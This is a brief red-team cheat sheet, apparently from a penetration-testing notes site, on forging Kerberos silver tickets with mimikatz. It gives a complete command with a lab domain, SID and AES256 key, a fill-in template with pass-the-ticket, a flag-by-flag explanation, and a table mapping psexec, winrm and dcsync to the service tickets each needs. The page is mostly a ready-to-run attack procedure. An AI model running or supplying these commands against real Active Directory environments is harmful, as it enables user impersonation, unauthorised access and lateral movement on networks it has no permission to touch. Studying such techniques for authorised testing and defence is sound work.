Silver Ticket

mimikatz # kerberos::golden /user:Administrator /domain:dev.cyberbotic.io /sid:S-1-5-21-3263068140-2042698922-2891547269 /target:srv-2 /service:cifs /aes256:babf31e0d787aac5c9cc0ef38c51bab5a2d2ece608181fb5f1d492ea55f61f05 /ticket:srv2-cifs.kirbi
# OR
kerberos::golden /user:<> /domain:<> /sid:<> /target:<> /service:<> /rc4:<> /ticket:silver.kirbi /ptt Where:
/useris the username to impersonate. (any user)/domainis the current FQDN domain name./sidis the current domain SID./targetis the FQDN target machine./serviceis the target service/rc4is the NTLM hash of the computer account/aes256is the AES256 key for the target machine./ticketis the filename to save the ticket as.
Technique
Required Service Tickets
psexec
CIFS
winrm
HOST & HTTP
dcsync (DCs only)
LDAP

Note: we can use the target machine hash as the service hash for the filesharing service (CIFS).
Last updated